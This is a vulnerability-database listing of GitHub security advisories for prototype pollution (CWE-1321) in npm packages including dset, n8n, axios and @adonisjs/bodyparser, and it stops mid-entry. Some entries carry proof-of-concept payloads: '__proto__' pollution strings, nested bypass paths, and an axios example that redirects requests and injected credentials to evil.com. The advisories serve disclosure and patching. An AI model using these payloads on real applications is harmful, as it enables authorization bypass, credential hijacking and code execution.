Common Weakness Enumeration

CWE-1321

Allowed

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Abstraction: Variant · Status: Incomplete

The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.

783 vulnerabilities reference this CWE, most recent first.

GHSA-Q4J7-V27R-FGCX

Vulnerability from github – Published: 2022-01-13 15:00 – Updated: 2022-01-11 18:13
VLAI
Summary
Prototype Pollution in realms-shim
Details

All versions of package realms-shim are vulnerable to Sandbox Bypass via a Prototype Pollution attack vector.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "realms-shim"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-23543"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-01-11T18:13:17Z",
    "nvd_published_at": "2022-01-10T14:10:00Z",
    "severity": "CRITICAL"
  },
  "details": "All versions of package realms-shim are vulnerable to Sandbox Bypass via a Prototype Pollution attack vector.",
  "id": "GHSA-q4j7-v27r-fgcx",
  "modified": "2022-01-11T18:13:17Z",
  "published": "2022-01-13T15:00:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23543"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Agoric/realms-shim"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-REALMSSHIM-2309908"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/realms-shim"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in realms-shim"
}

GHSA-Q4XC-7CW8-CGFJ

Vulnerability from github – Published: 2022-05-24 17:37 – Updated: 2024-02-01 21:04
VLAI
Summary
dset vulnerable to prototype pollution
Details

Overview

Prototype pollution vulnerability in 'dset' versions 1.0.0 through 2.0.1 allows attacker to cause a denial of service and may lead to remote code execution.

Details

The NPM module 'dset' can be abused by Prototype Pollution vulnerability since the function ‘export ()' did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.

PoC

The export function accepts three arguments obj, keys, val. Due to the absence of validation, at values passed into keys, val arguments, an attacker can supply a malicious value by adjusting the keys value to include the __proto__ property. Since there is no validation before assigning property to check whether the assigned keys is the Object's own property or not, the property isAdmin will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. Later in the code, if there is a check to validate isAdmin the valued would be substituted as "true" as it had been polluted.

const dset = require('dset');
var obj = {}
console.log("Before : " + obj.isAdmin);
dset(obj, '__proto__.polluted', true);
console.log("After : " + obj.polluted);
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "dset"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "2.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-28277"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-01T21:04:19Z",
    "nvd_published_at": "2020-12-29T17:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "### Overview\nPrototype pollution vulnerability in \u0027dset\u0027 versions 1.0.0 through 2.0.1 allows attacker to cause a denial of service and may lead to remote code execution.\n\n### Details\nThe NPM module \u0027dset\u0027 can be abused by Prototype Pollution vulnerability since the function \u2018export ()\u0027 did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.\n\n### PoC\nThe export function accepts three arguments `obj, keys, val`. Due to the absence of validation, at values passed into `keys, val` arguments, an attacker can supply a malicious value by adjusting the `keys` value to include the `__proto__` property. Since there is no validation before assigning property to check whether the assigned `keys` is the Object\u0027s own property or not, the property `isAdmin` will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. Later in the code, if there is a check to validate `isAdmin` the valued would be substituted as \"true\" as it had been polluted.\n\n```js\nconst dset = require(\u0027dset\u0027);\nvar obj = {}\nconsole.log(\"Before : \" + obj.isAdmin);\ndset(obj, \u0027__proto__.polluted\u0027, true);\nconsole.log(\"After : \" + obj.polluted);\n```\n",
  "id": "GHSA-q4xc-7cw8-cgfj",
  "modified": "2024-02-01T21:04:19Z",
  "published": "2022-05-24T17:37:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28277"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lukeed/dset/issues/11"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lukeed/dset/commit/2b9ec49e231107b1a83b04a1bc1a66a8d14cea1c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lukeed/dset/blob/50a6ead172d1466a96035eff00f8eb465ccd050a/src/index.js#L6"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20210104204657/https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28277"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "dset vulnerable to prototype pollution"
}

GHSA-Q5F4-99JV-PGG5

Vulnerability from github – Published: 2026-04-29 21:25 – Updated: 2026-05-08 01:31
VLAI
Summary
n8n has Prototype Pollution in XML Webhook Body Parser that Leads to RCE
Details

Impact

A flaw in the xml2js library used to parse XML request bodies in n8n's webhook handler allowed prototype pollution via a crafted XML payload. An authenticated user with permission to create or modify workflows could exploit this to pollute the JavaScript object prototype and, by chaining the pollution with the Git node's SSH operations, achieve remote code execution on the n8n host.

Patches

The issue has been fixed in n8n versions 1.123.32, 2.17.4, and 2.18.1. Users should upgrade to one of these versions or later to remediate the vulnerability.

Workarounds

If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Limit workflow creation and editing permissions to fully trusted users only.

These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.


n8n has adopted CVSS 4.0 as primary score for all security advisories. CVSS 3.1 vector strings are provided for backwards compatibility.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.123.32"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.18.0"
            },
            {
              "fixed": "2.18.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.17.0"
            },
            {
              "fixed": "2.17.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42231"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-29T21:25:02Z",
    "nvd_published_at": "2026-05-04T19:16:05Z",
    "severity": "CRITICAL"
  },
  "details": "## Impact\nA flaw in the `xml2js` library used to parse XML request bodies in n8n\u0027s webhook handler allowed prototype pollution via a crafted XML payload. An authenticated user with permission to create or modify workflows could exploit this to pollute the JavaScript object prototype and, by chaining the pollution with the Git node\u0027s SSH operations, achieve remote code execution on the n8n host.\n\n## Patches\nThe issue has been fixed in n8n versions 1.123.32, 2.17.4, and 2.18.1. Users should upgrade to one of these versions or later to remediate the vulnerability.\n\n## Workarounds\nIf upgrading is not immediately possible, administrators should consider the following temporary mitigations:\n- Limit workflow creation and editing permissions to fully trusted users only.\n\nThese workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.\n\n---\nn8n has adopted CVSS 4.0 as primary score for all security advisories. CVSS 3.1 vector strings are provided for backwards compatibility.\n\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  "id": "GHSA-q5f4-99jv-pgg5",
  "modified": "2026-05-08T01:31:38Z",
  "published": "2026-04-29T21:25:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-q5f4-99jv-pgg5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42231"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/n8n-io/n8n"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "n8n has Prototype Pollution in XML Webhook Body Parser that Leads to RCE"
}

GHSA-Q5J8-9M9G-X2JH

Vulnerability from github – Published: 2025-02-06 06:31 – Updated: 2025-02-06 23:30
VLAI
Summary
module-from-string prototype pollution
Details

A prototype pollution in the lib.requireFromString function of module-from-string v3.3.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "module-from-string"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-57072"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-06T23:30:54Z",
    "nvd_published_at": "2025-02-05T22:15:31Z",
    "severity": "HIGH"
  },
  "details": "A prototype pollution in the lib.requireFromString function of module-from-string v3.3.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.",
  "id": "GHSA-q5j8-9m9g-x2jh",
  "modified": "2025-02-06T23:30:54Z",
  "published": "2025-02-06T06:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57072"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/tariqhawis/8b1fe301dd1ea52952cef347daddee67"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/exuanbo/module-from-string"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "module-from-string prototype pollution"
}

GHSA-Q8JQ-4RM5-4HM5

Vulnerability from github – Published: 2025-04-01 14:54 – Updated: 2025-04-01 14:54
VLAI
Summary
@alizeait/unflatto Prototype Pollution
Details

Impact

alizeait unflatto <= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/index.js. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.

Patches

The problem has been patched in 1.0.3

References

https://github.com/advisories/GHSA-799q-f2px-wx8c

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@alizeait/unflatto"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-38988"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-01T14:54:36Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Impact\nalizeait unflatto \u003c= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/index.js. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.\n\n### Patches\nThe problem has been patched in 1.0.3\n\n\n### References\nhttps://github.com/advisories/GHSA-799q-f2px-wx8c",
  "id": "GHSA-q8jq-4rm5-4hm5",
  "modified": "2025-04-01T14:54:37Z",
  "published": "2025-04-01T14:54:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/alizeait/unflatto/security/advisories/GHSA-q8jq-4rm5-4hm5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38988"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alizeait/unflatto/issues/32"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alizeait/unflatto/commit/3c1b120f1dcd44eefe07d4a5022e1baa3c7164d3"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/mestrtee/4c5dfb66bea377889c44dd6c8af28713"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/alizeait/unflatto"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@alizeait/unflatto Prototype Pollution"
}

GHSA-Q8QP-CVCW-X6JJ

Vulnerability from github – Published: 2026-05-05 00:18 – Updated: 2026-05-12 13:28
VLAI
Summary
Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking
Details

Summary

Five config properties in the HTTP adapter are read via direct property access without hasOwnProperty guards, making them exploitable as prototype pollution gadgets. When Object.prototype is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request.

Affected Properties

  1. config.auth (lib/adapters/http.js line 617) Injects attacker-controlled Authorization header on all requests.
  2. config.baseURL (lib/helpers/resolveConfig.js line 18) Redirects all requests using relative URLs to an attacker-controlled server.
  3. config.socketPath (lib/adapters/http.js line 669) Redirects requests to internal Unix sockets (e.g. Docker daemon).
  4. config.beforeRedirect (lib/adapters/http.js line 698) Executes attacker-supplied callback during HTTP redirects.
  5. config.insecureHTTPParser (lib/adapters/http.js line 712) Enables Node.js insecure HTTP parser on all requests.

Proof of Concept

const axios = require('axios');

// Prototype pollution from a vulnerable dependency in the same process
Object.prototype.auth = { username: 'attacker', password: 'exfil' };
Object.prototype.baseURL = 'https://evil.com';

await axios.get('/api/users');
// Request is sent to: https://evil.com/api/users
// With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw=
// Attacker receives both the request and injected credentials

Impact

  • Credential injection: Every axios request includes an attacker-controlled Authorization header, leaking request contents to any server that logs auth headers.
  • Request hijacking: All requests using relative URLs are silently redirected to an attacker-controlled server.
  • SSRF: Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments.
  • Code execution: Attacker-supplied functions execute during HTTP redirects.
  • Parser weakening: Insecure HTTP parser enabled on all requests, enabling request smuggling.

Root Cause

mergeConfig() iterates Object.keys({...config1, ...config2}), which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (config.auth, config.socketPath, etc.), which traverses the prototype chain and picks up polluted values.

The own() helper at lib/adapters/http.js line 336 exists and guards 8 other properties (data, lookup, family, httpVersion, http2Options, responseType, responseEncoding, transport) from this exact attack. The 5 properties listed above are not included in this protection.

Suggested Fix

Apply the existing own() helper to all affected properties:

const configAuth = own('auth');
if (configAuth) {
  const username = configAuth.username || '';
  const password = configAuth.password || '';
  auth = username + ':' + password;
}

Same pattern for socketPath, beforeRedirect, insecureHTTPParser, and a hasOwnProperty check for baseURL in resolveConfig.js.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.15.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42264"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T00:18:38Z",
    "nvd_published_at": "2026-05-08T04:16:20Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nFive config properties in the HTTP adapter are read via direct property access without `hasOwnProperty` guards, making them exploitable as prototype pollution gadgets. When `Object.prototype` is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request.\n\n## Affected Properties\n\n1. **`config.auth`** (`lib/adapters/http.js` line 617)  Injects attacker-controlled `Authorization` header on all requests.\n2. **`config.baseURL`** (`lib/helpers/resolveConfig.js` line 18) Redirects all requests using relative URLs to an attacker-controlled server.\n3. **`config.socketPath`** (`lib/adapters/http.js` line 669) Redirects requests to internal Unix sockets (e.g. Docker daemon).\n4. **`config.beforeRedirect`** (`lib/adapters/http.js` line 698) Executes attacker-supplied callback during HTTP redirects.\n5. **`config.insecureHTTPParser`** (`lib/adapters/http.js` line 712) Enables Node.js insecure HTTP parser on all requests.\n\n## Proof of Concept\n\n```javascript\nconst axios = require(\u0027axios\u0027);\n\n// Prototype pollution from a vulnerable dependency in the same process\nObject.prototype.auth = { username: \u0027attacker\u0027, password: \u0027exfil\u0027 };\nObject.prototype.baseURL = \u0027https://evil.com\u0027;\n\nawait axios.get(\u0027/api/users\u0027);\n// Request is sent to: https://evil.com/api/users\n// With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw=\n// Attacker receives both the request and injected credentials\n```\n\n## Impact\n\n- **Credential injection:** Every axios request includes an attacker-controlled `Authorization` header, leaking request contents to any server that logs auth headers.\n- **Request hijacking:** All requests using relative URLs are silently redirected to an attacker-controlled server.\n- **SSRF:** Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments.\n- **Code execution:** Attacker-supplied functions execute during HTTP redirects.\n- **Parser weakening:** Insecure HTTP parser enabled on all requests, enabling request smuggling.\n\n## Root Cause\n\n`mergeConfig()` iterates `Object.keys({...config1, ...config2})`, which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (`config.auth`, `config.socketPath`, etc.), which traverses the prototype chain and picks up polluted values.\n\nThe `own()` helper at `lib/adapters/http.js` line 336 exists and guards 8 other properties (`data`, `lookup`, `family`, `httpVersion`, `http2Options`, `responseType`, `responseEncoding`, `transport`) from this exact attack. The 5 properties listed above are not included in this protection.\n\n## Suggested Fix\n\nApply the existing `own()` helper to all affected properties:\n\n```javascript\nconst configAuth = own(\u0027auth\u0027);\nif (configAuth) {\n  const username = configAuth.username || \u0027\u0027;\n  const password = configAuth.password || \u0027\u0027;\n  auth = username + \u0027:\u0027 + password;\n}\n```\n\nSame pattern for `socketPath`, `beforeRedirect`, `insecureHTTPParser`, and a `hasOwnProperty` check for `baseURL` in `resolveConfig.js`.",
  "id": "GHSA-q8qp-cvcw-x6jj",
  "modified": "2026-05-12T13:28:40Z",
  "published": "2026-05-05T00:18:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42264"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/pull/10779"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/axios/axios"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/releases/tag/v1.15.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking"
}

GHSA-Q9WR-GCJC-HQ52

Vulnerability from github – Published: 2020-09-04 15:12 – Updated: 2020-08-31 18:55
VLAI
Summary
Prototype Pollution in reggae
Details

All versions of reggae are vulnerable to prototype pollution. The function set does not restrict the modification of an Object's prototype, which may allow a malicious to add or modify an existing property that will exist on all objects.

Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "reggae"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:55:23Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "All versions of `reggae` are vulnerable to prototype pollution. The function `set` does not restrict the modification of an Object\u0027s prototype, which may allow a malicious to add or modify an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
  "id": "GHSA-q9wr-gcjc-hq52",
  "modified": "2020-08-31T18:55:23Z",
  "published": "2020-09-04T15:12:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1331"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Prototype Pollution in reggae"
}

GHSA-Q9XG-H756-8689

Vulnerability from github – Published: 2022-05-24 17:48 – Updated: 2023-07-11 17:00
VLAI
Summary
jquery-plugin-query-object contains prototype pollution vulnerability
Details

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in jquery-plugin-query-object 2.2.3 allows a malicious user to inject properties into Object.prototype.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "jquery-query-object"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-20083"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-11T17:00:33Z",
    "nvd_published_at": "2021-04-23T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027) in jquery-plugin-query-object 2.2.3 allows a malicious user to inject properties into Object.prototype.",
  "id": "GHSA-q9xg-h756-8689",
  "modified": "2023-07-11T17:00:33Z",
  "published": "2022-05-24T17:48:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20083"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/jquery-query-object.md"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CR6VGITIB2TXXZ6B5QRRWPU5S4BXQPD"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IJX6NVXSRN3RX3YUVEJQ4WUTQSDL3DSR"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/166299/WordPress-Core-5.9.0-5.9.1-Cross-Site-Scripting.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "jquery-plugin-query-object contains prototype pollution vulnerability"
}

GHSA-QCCF-Q7P4-3Q3J

Vulnerability from github – Published: 2020-09-04 15:16 – Updated: 2020-08-31 18:55
VLAI
Summary
Prototype Pollution in safe-object2
Details

All versions of safe-object2 are vulnerable to prototype pollution. The settter() function does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.

Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "safe-object2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:55:32Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "All versions of `safe-object2` are vulnerable to prototype pollution. The `settter()` function does not restrict the modification of an Object\u0027s prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
  "id": "GHSA-qccf-q7p4-3q3j",
  "modified": "2020-08-31T18:55:32Z",
  "published": "2020-09-04T15:16:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1335"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Prototype Pollution in safe-object2"
}

GHSA-QCM7-3VPR-HJ5H

Vulnerability from github – Published: 2026-06-30 18:34 – Updated: 2026-06-30 18:34
VLAI
Summary
@adonisjs/bodyparser has an incomplete fix for CVE-2026-25754
Details

Summary

The fix for GHSA-f5x2-vj4h-vg4c / CVE-2026-25754 introduced in commit 40e1c71 is incomplete and can be bypassed through nested prototype pollution payloads.

The original patch replaced the internal FormFields storage object with Object.create(null), preventing direct payloads such as __proto__.polluted. However, payloads containing a non-dangerous segment before __proto__ or constructor.prototype, such as user.__proto__.polluted, still lead to Object.prototype pollution.

This issue is exploitable remotely through a single unauthenticated multipart/form-data request using the default configuration.

Affected versions

  • >= 10.1.3 < 10.1.5
  • >= 11.0.0-next.9 < 11.0.3

Details

The regression tests added by the original fix only covered direct payloads such as:

  • __proto__.polluted
  • constructor.prototype.polluted

These payloads are blocked because the root object no longer inherits from Object.prototype.

However, lodash _.set() (via @poppinss/utils) still creates intermediate objects using plain {} values. Once a normal segment is encountered, subsequent __proto__ or constructor.prototype segments regain access to Object.prototype.

Impact

An unauthenticated attacker can remotely pollute Object.prototype on any route accepting multipart/form-data requests behind BodyParserMiddleware.

Because the pollution is process-wide, the impact may include authorization bypasses, unexpected behavior in downstream libraries, or prototype pollution gadget chains leading to remote code execution.

Patches

Fixes targeting v6 and v7 have been published below.

Users should upgrade to a version that includes the following fix:

  • https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5
  • https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3

References

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 10.1.4"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@adonisjs/bodyparser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.1.3"
            },
            {
              "fixed": "10.1.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 11.0.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@adonisjs/bodyparser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.0.0-next.9"
            },
            {
              "fixed": "11.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48795"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-30T18:34:32Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe fix for [GHSA-f5x2-vj4h-vg4c](https://github.com/adonisjs/core/security/advisories/GHSA-f5x2-vj4h-vg4c) / CVE-2026-25754 introduced in commit [`40e1c71`](https://github.com/adonisjs/bodyparser/commit/40e1c71f958cffb74f6b91bed6630dca979062ed) is incomplete and can be bypassed through nested prototype pollution payloads.\n\nThe original patch replaced the internal `FormFields` storage object with `Object.create(null)`, preventing direct payloads such as `__proto__.polluted`. However, payloads containing a non-dangerous segment before `__proto__` or `constructor.prototype`, such as `user.__proto__.polluted`, still lead to `Object.prototype` pollution.\n\nThis issue is exploitable remotely through a single unauthenticated `multipart/form-data` request using the default configuration.\n\n### Affected versions\n\n- `\u003e= 10.1.3 \u003c 10.1.5`\n- `\u003e= 11.0.0-next.9 \u003c 11.0.3`\n\n### Details\n\nThe regression tests added by the original fix only covered direct payloads such as:\n\n- `__proto__.polluted`\n- `constructor.prototype.polluted`\n\nThese payloads are blocked because the root object no longer inherits from `Object.prototype`.\n\nHowever, lodash `_.set()` (via `@poppinss/utils`) still creates intermediate objects using plain `{}` values. Once a normal segment is encountered, subsequent `__proto__` or `constructor.prototype` segments regain access to `Object.prototype`.\n\n### Impact\n\nAn unauthenticated attacker can remotely pollute `Object.prototype` on any route accepting multipart/form-data requests behind `BodyParserMiddleware`.\n\nBecause the pollution is process-wide, the impact may include authorization bypasses, unexpected behavior in downstream libraries, or prototype pollution gadget chains leading to remote code execution.\n\n### Patches\n\nFixes targeting v6 and v7 have been published below.\n\nUsers should upgrade to a version that includes the following fix:\n\n- https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5\n- https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3\n\n### References\n\n- [CWE-1321](https://cwe.mitre.org/data/definitions/1321.html)\n- Prior advisory this bypasses: [GHSA-f5x2-vj4h-vg4c](https://github.com/adonisjs/core/security/advisories/GHSA-f5x2-vj4h-vg4c) / CVE-2026-25754",
